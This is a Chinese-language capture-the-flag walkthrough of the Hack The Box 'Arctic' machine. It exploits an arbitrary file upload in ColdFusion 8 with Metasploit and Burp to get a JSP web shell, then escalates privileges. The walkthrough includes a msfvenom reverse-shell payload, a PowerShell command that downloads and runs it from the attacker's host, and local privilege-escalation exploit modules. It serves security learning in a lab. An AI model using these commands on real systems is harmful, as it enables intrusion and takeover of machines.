Arctic(ColdFusion任意文件上传)

scan

1
2
3
4
5
6
7
8
Discovered open port 8500/tcp on 10.10.10.11                                   
Discovered open port 135/tcp on 10.10.10.11                                    
Discovered open port 49154/tcp on 10.10.10.11

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
os : Microsoft Windows Vista           

尝试1: rpc漏洞检查

google搜索。。。

1
2
3
search ms03-026
use exploit/windows/dcerpc/ms03_026_dcom
show options

检查8500端口

1
2
3
4
5
6
7
8
9
telnet 10.10.10.11 8500

Trying 10.10.10.11...

Connected to 10.10.10.11.

Escape character is '^]'.

Connection closed by foreign host.

fmtp: flight-message-transfer-protocol,网上查了一下,没有见过这个协议,也不知道具体是干什么的。

思路

2 没有任何操作思路。

根据wp学习一下。 ColdFusion应用程序由一组后缀名为CFM的文本文件构成,这些文件实现了该应用程序的功能…

1
2
3
4
5
6
searchsploit coldfusion
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) 

msfconsole
search ColdFusion
use exploit/windows/http/coldfusion_fckeditor

burp设置代理,将访问127.0.0.1:8500的地址,发往10.10.10.11:8500。 3 4
将msf的payload,用burp repeater截包。

1
2
3
set RHOST 127.0.0.1
set RPORT 8500
run

5 观察右下角,响应用了17秒

获得一个shell

浏览器访问地址:http://localhost:8500/userfiles/file/ECZLO.jsp 6 获得了一个shell。

info enum:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
》whoami
arctic\tolis
》systeminfo
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          31/1/2019, 7:52:38 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz
                           [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 241 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.209 MB
Virtual Memory: In Use:    839 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

提权

本地执行:

1
2
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="10.10.14.7" LPORT=7767 -f exe -o m.exe
msf执行监听,本地ip,端口7767

shell执行:

1
2
3
4
5
6
7
8
9
10
11
12
cd C:\Users\tolis\Desktop
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.7/m.exe', 'm.exe')"
start p.exe 成功反弹metepreter

[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.

use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set LHOST xxxx
run

7

总结

学习了burp设置代理,达到访问127.0.0.1等于访问远程的效果。

msf设置RHOST为127.0.0.1,burp可以拦截msf发送的数据包